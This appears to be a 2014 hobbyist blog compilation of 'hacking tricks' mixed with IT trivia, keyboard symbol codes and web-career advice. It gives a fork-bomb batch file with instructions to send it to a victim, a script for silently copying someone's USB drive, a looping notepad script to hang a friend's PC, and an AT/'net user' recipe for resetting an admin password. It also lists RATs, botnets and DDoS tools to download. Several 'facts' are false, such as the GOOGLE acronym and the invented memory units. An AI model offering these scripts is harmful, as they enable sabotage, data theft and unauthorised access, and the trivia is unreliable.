Sunday 30 November 2014

Top 10 Hacking Movies

1 HACKERS-1995
2 The Italian Job-2003
3 Antitrust-2001
4 Takedown-2000
5 Untraceable-2008
6 Revolution OS-2001
7 Tron-1982
8 Wargames-1983
9 MI4: Ghost Protocol-2011
10 The Girl with the Dragon Tattoo-2009

Some facts about computers and IT Field.


1.A byte means 8 bits and a nibble means 4 bits.
2.First harddisk available was of 5MB
3.Ethernet is the registered trademark 0f Xerox.
4.google uses over 10000 network computers to crawl the web
5.Google can be queried in 26 languages
6.The floopy disk was patented by allen shugart in 1946.
7.More than 80% of web pages are in english.
8. 88% percent web pages have very low traffic rate.
9. An average american is dependent on 250 computers.
10.Internet is most fastest growing platform for advertisement.
11.About one third of CDs are pirated
12.About 76% softwares used in india are pirated.
13.Only 10% of the webpages are used by the search engines
14."I am feeling Lucky" This button is used by negligibal no of people on net.
15.Bill gates&Paul Allen started a company called Traf-O-Data to monitor traffic flow.
16.The four largest software makers in the world are:
(a) Microsoft
(b) Adobe
(c) Sap
(d) Computer Associates.
17.Top Ten Supercomputers of Today's Generation Arranged according to the speed:
1. Bluegene/ L DD2 Beta-system(IBM).
2. Columbia (NASA).
3. Earth Simulator (NEC).
4. MareNostrum(Bar celona Supercomputer Center).
5. Thunder (Lawrence Livermore National Laboratory).
6. ASCI Q(Los Alamos National Laboratory).
7. System X(Virgina Tech).
8. Blugene/L DD1 Prototype(IBM).
9. eServer pSeries 655 cluster(Naval Oceanographic Office).
10. Tungsten(National Center For Supercomputing Applications).

Languages Used in Most Famous Websites

1. Google – Java (Web), –C++ (indexing).
2. Facebook – PHP.
3. YouTube- Flash, Python, Java.
4. Yahoo– PHP and Java.
5. Microsoft Live.com–.NET
6. Baidu – Unknown
7. Wikipedia – PHP
8. Blogger – Java
9. MSN – .NET
10.Twitter – Ruby on Rails, Scala, Java

Don't forget to hit like and share.

Respect Hackers!

Respect Hackers!

If you are using windows, free of cost
that is just bcoz of hackers..
If you are using full version software's free
that is bcoz of hackers..

They spend most of their time on laptop, pc, discover hacking tricks
and share their tricks to mass audience

Facebook on which Livelihood of millions of people Depend.
Some People doing social media marketing , doing part time or full time job .
that is bcoz of Mark Elliot Zuckerberg one of five co-founders of the social networking website Facebook .

another example is Google on which you daily depend. so

Whatever they discover, all is for us

So, Respect a hacker they make your life easy

Grate Thoughts

"I didn't complete my University.."--­ Bill
Gates
"I Stitched Shoes in childhood.."--
Abraham Lincoln
"I was the one who served in
Hotels.."Oberoi
"I was Conductor.."-- Rajnikanth
"I worked at Petrol Pump.."-- Dhirubhai
Ambani
"I Failed in class 10th.."-- Sachin Tendulkar
"I was a Drop out n Keyboard Player.."--
A.R.Rahman
"I Slept on a Bench&borrowed Rs 20
everyday
from friend to travel to filmcity.."--
Shahrukh Khan
"I used to serve Tea to support my Football
Training.."-- Lionél Messi
~ Life isn't about finding yourself
Life is about creating yourself~

How To Know our own mobile Number On Zero Balance:

How To Know our own mobile Number On Zero Balance:

For Airtel– *121*9#
For Airce l- *888#
For Docomo – *580#
For IDEA -*100#
For Videocon -*1#
For Virgin -*1# For Vodafone -*111*2#
For Reliance -*1#

HOW TO MAKE SYMBOLS WITH KEYBOARD

Alt + 0153..... ™... trademark symbol
Alt + 0169.... ©.... copyright symbol
Alt + 0174..... ®....registered trademark symbol
Alt + 0176 ...°......degree symbol
Alt + 0177 ...±....plus-or-minus sign
Alt + 0182 ...¶.....paragraph mark
Alt + 0190 ...¾....fraction, three-fourths
Alt + 0215 ....×.....multiplication sign
Alt + 0162...¢....the cent sign
Alt + 0161.....¡......upside down exclamation point
Alt + 0191.....¿.....upside down question mark
Alt + 1...........smiley face
Alt + 2 ......?.....black smiley face
Alt + 15.....¤.....sun
Alt + 12......?.....female sign
Alt + 11.....?......male sign
Alt + 6............spade
Alt + 5.............Club
Alt + 3.............Heart
Alt + 4.............Diamond
Alt + 13......?.....eighth note
Alt + 14......?......beamed eighth note
Alt + 8721.... ?.... N-ary summation (auto sum)
Alt + 251.....v.....square root check mark
Alt + 8236.....8.....infinity
Alt + 24.......?.....up arrow
Alt + 25......?......down arrow
Alt + 26.....?.....right arrow
Alt + 27......?.....left arrow
Alt + 18.....?......up/down arrow
Alt + 29......?...left right arrow

How to become Web Engineer ?


According to IT w0rld, Statistics every year 1 Billion domains registered and definitely a domain require website and Website require a Website Designer or Developer.
Internet is the biggest and Greatest discover ever, Today's generation 91% of the world population uses Internet in any how Condition. Every Internet Post, Article require an elegant and awesome look of website to attract users and customers.
Following the above Paragraph this proofs our IT Department require Web Designer and Developer.

What is Web Engineer and How to become web Engineer and What is the Scope in it ??

You might think about scope, Salary, How to become and What to learn Check out below Examples and defination :-

Web Engineering contains two types of contents :-

1. Web Developer
2. Web Designer
and both mixture is called {Web Engineer}

Define :-
What is Web Engineering ?
The Web Engineer is the one who Designs and Develop every content and looks of Website, Web Engineer always have to think different from others to make his Website most Elegant and wonderful, Web Designing and Engineering is an art to express their Hard work as a wonderful Design and Looks .

How to learn and Become Web Designer :-
To learn and become leading Web Enginner join any Institute which Provides Courses such as Web Designing, Web Engineering or Web Developing. Basically to become web engineer you need to learn Web Programming languages and Practice it

OR learn below all things step by step :-

1. HTML (Hypertext Markup Language)
2. XHTML (Extensible Hypertext Markup Language)
3. CSS (Cascading Sheet Styles)
4. Javascript.
5. Dreamweaver (An Adobe advanced Software to Develop Web)
6. PHP (Hypertext Preprocessor)
7. ASP (Active Server Pages)
8. SQL (Structured Query Language)
9. Coldfusion
10. XSLT (Extensible Stylesheet Language Transformations

If you will learn Above all 10 Programming languages then you can be the master in Web Engineering and you can also create any website like Facebook or anything. Above The all contents are written by Hack w0rm by their own knowledge and Studies.

Scope in Web Engineering :-
As above first paragraph of Example we told you our country and IT world require more and more IT Developers and Web Engineer to make our web more safer and Elegant
Basically a Web Engineer works for IT's Companies such as Adobe, Microsoft, Corel, Google, Apple, Facebook and many popular companies which hire Web Engineers and even Small Scale leading Business require an Engineer to develop and Design web

If you did degree and Bachelor in Web Engineering then you will definitely get 70,000 (70k) in India.
If you did Course and all and you get certified then it will be 50,000 or 60,000 monthly.
and Last if you did both and working in Abroad then it will go-up till 90,000 and 1 lakh Monthly
America, UK, US, Japan, Australia, etc these all countries are very far in Technology and IT world they require more and more and more and more ................ to make their Internet world more safer and more Elegant

HOW TO CREATE LOGIC BOMB VIRUS

>>HOW TO CREATE LOGIC BOMB
VIRUS :-
===============
=============== =======
Its Just too easy to create, just
follow the below steps.
1) Open Notepad on your PC and
write this Code into it.
%0|%0 or copy it from here to your
Notepad
2) Then save it with
a .batextension! When saving
delete the .txt and input the File
name and the .bat extension e.g
logic.bat
3) Once anyone will do double
click on this bat file, his system
will Jam and Crash.
NOTE: Now you can send it to your
Victim through Mail or from your
Flash Drive to his PC and then once
he open the File, the action
will start. SOLUTION OR
PREVENTION MEASURE TO TAKE
Due to members comments asking
for Solution and the Way
to Prevent this Attack, We have
listed this 2 Reliable Ways to
conquer it. not open any File
with .bat on your PC.If you are
already a victim of this Virus, Once
you ON your PC,
quickly Press ctrl + alt + delete key
on your keyboard then Start
the Task Manager, Now click on the
Processes Tab and locate
Fork.bat or anyname you Use, then
put you mouse on it and
click on the End Process Button,
thats all.
plz only for Educational
purpose.....don 't use it for any
illegal purpose...we r not
responsible for that
Jun 5

Hack Pack Must Download Search from Google

Admin Finder
VPN
Binders
Booters
Botnet
Bruteforcers
Chat Exploits
CommView
Crackers
Darkcomet
Ddosers
Deface Creators
Dork Seeker
DoS - DDoS
Doxing Tools
Ebooks
Email
Encrypter and Decrypter
Exploit Scanner
Gmail Cracker
Havij 1.15 Pro
IEInspector
Injectors
IP scanners
AccountCreators
Admin Page finder
Maillist
Blackshades 4.8
Bombers
Cpanel bruteforcer
Crypters
DarkComet REMOVER
Deface Pages
Dork List
Doxers
Duplicate Remover
Instagram Bots
Youtube Bots
Keylogger
md5
MSN Freezer
No-IP
Portscanner
Proxy Finder
80 DIFFERENT RAT'S !!!!
Youtube Tools

Hackers Dictionary

Let us start our journey from the basics! Below are some frequently used words, their brief meaning and acronyms
that are commonly used in this world!

R.A.T :- Remote Administration Tool

DDoS :- Distributed Reflected Denial of Service Attack,
uses a list of reflection servers or other methods such as DNS to spoof an attack to look likeit's coming from
multiple ips. Amplification of power in the attack COULD occur

VPS :- Virtual Private Sever

SE :- Social Engineering

HTTP :- Hyper Text Transfer Protocol. The foundation of
data communication for the WorldWide Web.

SSH :- Secure Shell, used to connect to Virtual Private Servers.

FTP :- File Transfer Protocol. Usedfor transferring files
over an FTP server.

XSS (CSS) :- Cross Site Scripting

Malware :- Malicious Software

Skid :- Script Kid/Script Kiddie

DDoS :- Distributed Denial of Service

VPN :- Virtual Private Networ

Nix :- Unix based operating system, usually referred tohere when referring to DDoS'in

SQL :- Structured Query Language. It usually goes along with a word after it, such as "SQL |njection."

FUD :- Fully Undetectable
WORDS

FUD :- Fully undetectable, can be used in many terms.
Generally in combination with crypters, or when trying to
infect someone.

LOIC/HOIC :- Tool(s) used by many anonymous members
to conduct DDoS attacks. It is not recommended to use these under any circumstances.

Trojan :- A Trojan is a type of malware that masquerades
as a legitimate file or helpful program with the ultimate purpose of granting a hacker unauthorized access to a
computer.

Botnet :- Computers infected by worms or Trojans and
taken over by hackers and brought into networks to send
spam, more viruses, or launch denial of service attacks.

SQL Injection :- An SQL injection is a method often used to hack SQL databases via a website, and gain admin
control of the site.

Root :- Highest permission level on a computer, able to
modify anything on the system without restriction.

Warez :- Software piracy

White Hat :- A "white hat" refers to an ethical hacker, or a computer security expert, who specializes in penetration
testing and in other testing methods to ensure the security
of a businesses information systems. (Good guy, per se)

Rootkit (ring3 ringO) :- A powerful exploit used by
malware to conceal all traces that it exists. Ring3 - Can be
removed easily without booting insafemode. Ring0 — Very
hard to remove and very rare in the wild, these can require
you to format, it's very hard to remove certain ring0 rootkits
without safemode.

Script Kiddie :- A script kid, or skid is a term used to describe those who use scripts created by others to hack computer systems and websites. Used as an insult, meaning that they know nothing about hacking.

IP Grabber :- A link that grabs someone’s IP when they visit it.

DDoS :- Distributed denial of service. Flooding someones connection with packets. Servers or web-hosted shells can
send packets to a connection on awebsite usually from a
booter.

VPS :- The term is used for emphasizing that the virtual machine, although running in software on the same physical computer as other customers’ virtual machines, is in many respects functionally equivalent to a separatephysical computer, is dedicated tothe individual
customer's needs, has the privacy of a separate physical
computer, and can be configured to run server software.

Mlalware :- Software designed todo all kinds of evil stuff like stealing identity information, running DDoS attacks, or
soliciting money from the slave.

Phreak :- Phone Freaks. Hackers who hack cell phones
for free calling. Free Long distancecalling. Etc.

Bot :- A piece of malware that connects computer to an attacker commonly using the HTTPor IRC protocal to await malicous instructions.

Shell :- The common meaning here is a hacked web server with a DoS script uploaded to conduct DDoS attacks
via a booter.

ANSI Bomb :- ANS|.SYS key-remapping commands
consist of cryptic-lookingtext thatspecifies, using ansi numeric codes to _redefine_keys.

DOX :- Personal information about someone on the
Internet usualy contains real name, address, phone
number, SSN, credit card number, etc.

Worm :- Software designed to spread malware with little
to no human interaction.

Deface :- A website deface is an attack on a site that
changes the appearance of the site or a certain webpage

Keylogger :- A software program that records all
keystrokes on a computer's keyboard, used as a surveillance tool or covertly as spyware.
Remote Administration

Tool :- It's a general term for a hack that can let someone remotely control your computer
with admin access.

Black Hat :- A hacker who performs illegal actions to do with hacking online. (Bad guy, perse)

Best Hacking Tricks To Increase Your Internet Speed

Speed Up Your Net Speed By 20%

1. First you go to start button
2. Go To Run
3. Type gpedit.msc And Then Hit Enter.
4.Then Expand Administrative Templates.
5.Then Network
6.Then QoS Packet Scheduler.

Now A New List Appear . Click On Limit Reservable Bandwidth.

Just Disable it.

Now You Click On Apply.
That's It Now You Are Done !!

Now Just Restart Your Computer . And I hope You will Get change in Your Speed

Some Basic Tricks From My Side-

1. Use IDM To Boost Your Downloading Speed.
2. Use A Good Anti-virus in Your Computer.
3. Remove Unwanted Add-ons, Software,Unwanted Files Form Your Computer.
4.Update Your Drivers Periodically.
5.Keep A Good Maintenance Of Your Computer.

Get Data of someone Without his permision

Awesome trick try must want to 
steal someones data from any usb
pen drive?? [Without his/her permission].
(for windows only) believe me u can easily 
copy someone's data into your PC without 
giving any idea to the other person...!!
u may need to create a batch file
for this..!! as u all know we can create 
batch files to execute specific lines of
codes..continue ­ ­sly..!!
so...in order to create that batch file..u
have to first open Notepad or any
text editor u want..!!
in that editor..write the following
lines of batch script..!!
------------CUT HERE------------------
xcopy G: H:\pendrive /h /s /c /q /i
exit
------------CUT HERE------------------
where "G:" is the location of your
USB
pendrive (u can change it
according to your
usb port location)
xcopy is windows command
which is used
to copy data from one location to
other..!!
H:/pendrive is the location where
the data from the pendrive will be 
copied (u can also change the path 
according to you)
i know there are many softwares
available on internet for this purpose but
its the simplest way to create such a data
stealing stuff..!!

Monday 3 November 2014

How to Spoof MAC Address on Android Phones

A Media Access Control address (MAC address) is a 12-character unique identifier assigned to a specific piece of hardware such as the network adapter of your WiFi device. In simple words, a MAC address can be used to uniquely identify your Android phone on the Internet or the local network.

Spoof MAC Address

Even though MAC address is embedded on the hardware device during manufacture, it can still be spoofed to input a new one of your choice. Here is a detailed instruction on how to spoof MAC address on your Android phone.

Before you spoof the MAC address, you need to record the original/current MAC address of your device which can be done according to the instruction below:

On the Home Screen of your phone, tap Menu button and go to Settings.
Tap About Device and go to Status
Now scroll down to record the 12-digit code shown under Wi-Fi Mac address. An address would read something like:

Example MAC address: E5:12:D8:E5:69:97

Requirements for Spoofing the MAC Address

Rooted Android Phone
BusyBox app installed on your phone
Once BusyBox is installed, you need to install Terminal app

Once the above requirements are satisfied, follow the instructions below to spoof your MAC address:

Open the Terminal app and type the commands as listed below:

$ su [HIT ENTER]

$ busybox iplink show eth0 [HIT ENTER]
(This will show your current MAC address, just for your confirmation)
Now, type the following command:

$ busybox ifconfig eth0 hw ether XX:XX:XX:XX:XX:XX [HIT ENTER]
(In the above command, replace XX:XX:XX:XX:XX:XX with your new MAC address)
You have now spoofed your MAC address successfully. To check for the change enter the following command again:

$ busybox iplink show eth0 [HIT ENTER]
(Now you should see your new MAC address)

Sunday 2 November 2014

How to Hang Computer

Notepad Trick to Open notepad continuously

To Open Notepad continuously in your friend’s computer:
Type the code in notepad as :

@ECHO off

:top

START %SystemRoot%\system32\notepad.exe

GOTO top

Save it as “notepad.BAT” and send it.
Note: If you want to try it, then go ahead and when you built this file double click to open it. But beware it slows your system and you will be left with no other option than to restart, as this script opens 100’s of notepad window. So, If you want to try this than save all your work and then run this file.

Crack into admin acc from limited account

Crack into admin acc from limited account(99.99% works)

Go to cmd

type AT (time) /interactive “cmd.exe”

enter time in 24hr format

means if you want to enter 5.00pm then enter 17:00

then a new window of cmd will open at specified time

In new window type net(space)user

press enter

after this u will see some names on urscreen

notedown the name of admin acc

then type

net user (name of admin acc u want to crack into) *
e.g if the name of admin acc is john then type

net user john *

then it will ask u for new password

enter password of urchoice

and u got the admin password



Why Hackers and Programmers choose Linux

Why Hackers and Programmers choose Linux instead of Windows and Mac ?

*Linux is advanced High Level OS
*Comfortable for Hackers
*24/7 always virus free
*Greatest OS for Programmers to develop Soft.
*Always free
*All OS born from Linux only
*Linux contain all types of Programming lan and Hacking tools
*Linux is the No. 1 for Server and Client Scripting
*Windows is Base and Linux is Race
*Linux have high developed Programmed
*Linux is the open source OS

Saturday 1 November 2014

The way of Windows XP Password

Forgot Password or if you want to log on toanother computer; Just follow this process.

~ ~ ~ ~ :: Process :: ~ ~ ~ ~

1) Start the Computer.
2) When asked for a password hit ctrl alt delete twice.
3) Now another window will open asking for a password.
4) In this type in the username "administrator"
.... Leave PasswordBlank field and press Enter.
5) NOW !! U are logged in as a user.
6) Now you only have full authority problem is that you can not open "My Documents" from
the original account.

Full Name of IT Company

GOOGLE :- Global Organization Of Oriented Group Language of Earth
HP :- Hewlett-Packard
IBM :- International Business Machines Corporation
HCL :-Hindustan Computer Limited
WIPRO :- Western India Product Limited
GE :-General Electronics
INFOSYS :-Information System
TCS :- Tata Consultancy Services
AOL :- American Online
BPL :- British Process Laboratory
INTEL :- Integrated Electronics
CISCO :- Computer Information System Company
DELL :- michael DELL
SONY :-Sound Of New York
AMD :- Advance micro devices
LENOVO :- LE(Legend),NOVO(New)
COMPAQ :- Compatibility And Quality
LG :- Lucky-Goldstar

FaceBook ShortCut Key

FaceBook ShortCut Keyboard Shortcuts For Facebook

Most of us spend hours chatting and surfing on facebook. So here are some useful facebook keyboard shortcuts for Google chrome and Mozilla Firefox users.


Mozilla Firefox

Shift+Alt+1:Vie w your News Feed
Shift+Alt+2:Vie w your own Profile
Shift+Alt+3:Vie w pop-up of friend requests
Shift+Alt+4:Vie w pop-up of messages
Shift+Alt+5:Vie w pop-up of notifications
Shift+Alt+6:Vie w Account Settings
Shift+Alt+7:Vie w Privacy Settings
Shift+Alt+8:Vie w Facebook’s own profile
Shift+Alt+9:Rea d latest Terms of Service agreement.
Shift+Alt+0:Ope n Facebook Help Center 

Google Chrome

Alt+1:View your News Feed
Alt+2:View your own Profile
Alt+3:View pop-up of friend requests
Alt+4:View pop-up of messages
Alt+5:View pop-up of notifications
Alt+6:View Account Settings
Alt+7:View Privacy Settings
Alt+8:View Facebook’s own profile
Alt+9:Read latest Terms of Service agreement.

Memory units from Bit to Coperbyte.

How big can a computer memory be? Here is a list of memory units from Bit to Coperbyte.

NOTE:- Still Some Left and Some to be made

1 Bit = 1 Binary Digit8 Bits = 1 Byte
1024 Bytes = 1 Kilobyte
1024 Kilobytes = 1 Megabyte
1024 Megabytes = 1 Gigabyte
1024 Gigabytes = 1 Terabyte
1024 Terabytes = 1 Petabyte
1024 Petabytes = 1 Exabyte
1024 Exabytes = 1 Zettabyte
1024 Zettabytes = 1 Yottabyte
1024Yottabytes = 1 Brontobyte
1024 Brontobytes = 1 Geopbyte
1024 Geopbyte = 1 Saganbyte
1024 Saganbyte = 1 Pijabyte
1024 Pijabyte = 1 Alphabyte
1024 Alphabyte = 1 Kryatbyte
1024 Kryatbyte = 1 Amosbyte
1024 Amosbyte = 1 Pectrolbyte
1024 Pectrolbyte = 1 Bolgerbyte
1024 Bolgerbyte = 1 Sambobyte
1024 Sambobyte = 1 Quesabyte
1024 Quesabyte = 1 Kinsabyte
1024 Kinsabyte = 1 Rutherbyte
1024 Rutherbyte = 1 Dubnibyte
1024 Dubnibyte = 1 Seaborgbyte
1024 Seaborgbyte = 1 Bohrbyte
1024 Bohrbyte = 1 Hassiubyte
1024 Hassiubyte = 1 Meitnerbyte
1024 Meitnerbyte = 1Darmstadbyte
1024 Darmstadbyte = 1 Roentbyte
1024 Roentbyte = 1 Coperbyte